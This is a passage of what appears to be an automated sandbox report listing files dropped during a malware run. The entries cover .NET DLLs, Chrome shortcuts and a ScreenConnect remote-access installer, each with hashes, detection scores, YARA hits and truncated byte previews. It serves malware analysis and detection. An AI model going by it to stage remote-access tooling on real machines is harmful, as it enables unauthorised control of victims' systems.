                                        Entropy (8bit):7.789940577622617
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                        SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                        SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                        SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):234
                                        Entropy (8bit):4.977464602412109
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                        SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                        SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                        SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                        Malicious:false
                                        Reputation:unknown
                                         Preview:
                                         <?xml version="1.0" encoding="utf-8" ?>
                                         <configuration>
                                           <startup useLegacyV2RuntimeActivationPolicy="true">
                                             <supportedRuntime version="v4.0" />
                                             <supportedRuntime version="v2.0.50727" />
                                           </startup>
                                         </configuration>
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):49152
                                        Entropy (8bit):4.62694170304723
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                        SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                        SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                        SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):36864
                                        Entropy (8bit):4.340550904466943
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                        SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                        SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                        SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):57344
                                        Entropy (8bit):4.657268358041957
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                        SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                        SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                        SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):176128
                                        Entropy (8bit):5.775360792482692
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                        SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                        SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                        SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):11776
                                        Entropy (8bit):5.273875899788767
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:73A24164D8408254B77F3A2C57A22AB4
                                        SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                        SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                        SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.9883433216369224
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D27E10DC2089E0BFFF8A76D42E077AED
                                        SHA1:BE9ABACD725A6180CFBF96FC869D636FEB7790AE
                                        SHA-256:68F3EC5E2EB8E572D535D79313178687A7012B6EDEF8BE7106971919B49E84DB
                                        SHA-512:5389F0597C49A589453DB25F13095209CAB25CDF179367D037F63891D19344E05D87A3223EF80D070BA7E5E9B9370F74BE4653E8539DE02FC677E5D1C646A714
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....cF..:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2679
                                        Entropy (8bit):4.005316326320001
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:64C2BBB058244FCD2768C4A7AAE9496A
                                        SHA1:05A21A33DDE1A5CC649F92B92B47F74CFDBD2060
                                        SHA-256:5FC439D7C69CFEC6B233077AF5B388EE0A84484CC30BF07D2B2418E96BEFB725
                                        SHA-512:B5176C2FC3EE497B457FDA93BAFA62AA48572A768458E947F2374372465C430FAADDCF395C9E787727BA1AE3AACF557790F37A325E4CCBF473CA4FBECD1FBDA9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....o8..:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2693
                                        Entropy (8bit):4.015440715670797
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9FD51F210CBAB582C8C7A219BEBCA2A2
                                        SHA1:75711242AB690F8D3A5D81D68767FCEF09150534
                                        SHA-256:A3645A83BF0968E35154449C8CA9DD7CDC29D56BF3F1EC72E566641B89EEB7C1
                                        SHA-512:AD83E79755BF17E54CB124032087E24CB585F86C038290DE4BD40C62705C35B9B87AFA62DAA6CB01FEB8BA121FB37BADAAEA5EA2FE0E21DADD480ACBCFB0D362
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2681
                                        Entropy (8bit):4.005155231052511
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:84A9FF1504FEF73167FAB70A548AD9F2
                                        SHA1:1992D5AA7B46424C7B5992B09F3D7F063C64AB1B
                                        SHA-256:BB80CF6941A58B092584C250E10A202B7182CF20D59E5C6A02BA365B0E0DFCFC
                                        SHA-512:6469B0C8C916876324F84C6B81C26124BCF4856F551FDC6C6FDD07AC94FE7BC44AFAED7D6954AD4225CA15ADAA5C61F01EC35AF2A0A5E11E81D198F393CA04C1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,........:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2681
                                        Entropy (8bit):3.993499260953557
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:432E75BC1469001AE7D44FB85C9245F4
                                        SHA1:A61744EB4B2795DCCEAF5AB2D4D139C9CAE04C00
                                        SHA-256:0F400DF8DD76D9B2D3991AD1606D310997924A7CFC74999EED51E3C128DA1C96
                                        SHA-512:77CD3573E3893FC99CC5CAF00195E4F5750A1C583A92997BBE3AAA7898C737950361E7B0B660DBAD0D881AB775817C3CFF265F00B8AF0D6BFF3D897591CF32EC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,........:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2683
                                        Entropy (8bit):4.004835280661964
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:45472860E54C5364B02D1FFBB894748D
                                        SHA1:B12D36951ED18FB2B738D666E46B27D3707C15ED
                                        SHA-256:8B8FB227804ECED37AEE8E186F3CAF5ADACA9B167AE9827320A12ED441461FB5
                                        SHA-512:BF799D56D25099511FAB2C923A568B41DA77150F3E1EC7A119607E8B8357BDEC13F7C57F6AD0705A601669F779A0653BA15E763C24F4F8B73C1DB5B5BE161D92
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....SD..:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):0
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:70D47FA2E078F04400D3D1B236245678
                                        SHA1:987AA3368265FC300B10B4128D8367C3D7A29C6C
                                        SHA-256:B0A8D541B650FFFF1BB4B3690AF389E52B1675212129560DBE33038B1041266B
                                        SHA-512:A078EC2AA08F1928B7CEF2B3B17E02E5A52860DD684AD798AB8ACA0A55D1069F45E27497FABF15C4E932299FE206ED4E49085848A1BC3AE087B13ECE36F768E2
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 26%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT.p{....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):5627248
                                        Entropy (8bit):7.427623078135939
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:70D47FA2E078F04400D3D1B236245678
                                        SHA1:987AA3368265FC300B10B4128D8367C3D7A29C6C
                                        SHA-256:B0A8D541B650FFFF1BB4B3690AF389E52B1675212129560DBE33038B1041266B
                                        SHA-512:A078EC2AA08F1928B7CEF2B3B17E02E5A52860DD684AD798AB8ACA0A55D1069F45E27497FABF15C4E932299FE206ED4E49085848A1BC3AE087B13ECE36F768E2
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 367452.crdownload, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 367452.crdownload, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 367452.crdownload, Author: Joe Security
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT.p{....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):16833
                                        Entropy (8bit):6.471275006794133
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:86A0DB1A30A14B7469766B476B3899AA
                                        SHA1:AF7E095E376664D814DB0121CDA4E16D37D7DCD1
                                        SHA-256:8AF9E64282C84201C53B717105975C0680150A350B9A278C08B263BF88C86304
                                        SHA-512:001159C6E941D5AAE68B55CB35A050D7FC98AD37A3E4219DE701EBDBC8BD628DBB1B79F8B980454084558949FC1B86100CBDECE486A66BCD374A58E16BCB48C7
                                        Malicious:true
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT.p{....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                        Category:dropped
                                        Size (bytes):13369344
                                        Entropy (8bit):7.966971359391998
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DBA166C47F82656C2399F7223DE2DB3F
                                        SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                        SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                        SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):423885
                                        Entropy (8bit):6.577024425752241
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8658789343259DADECC392441A6DD845
                                        SHA1:22F6DC5C662C0233033B888B7371E31974DEED14
                                        SHA-256:8C7538093E779EE10DC0F8A68448C4927EC834706D6810C50022B522C775FD68
                                        SHA-512:26E560AF9E5161F9038BED1BA1B46C5AF5D8DC9A0F3CF9BE6B7AC2CDE2C698B3BF772EEF374A48F34714EC123336266BB8465ADA8478CA76B68F6AD559D3E7EA
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI71A0.tmp, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI71A0.tmp, Author: Joe Security
                                        Reputation:unknown
                                        Preview:...@IXOS.@.....@#@&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E29000A5-D988-BF34-ACFB-64A448AB1544}^.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}f.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}c.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileMa
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):207360
                                        Entropy (8bit):6.573348437503042
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.1725223063130226
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3808275A1E28907AE85F14032F7F639F
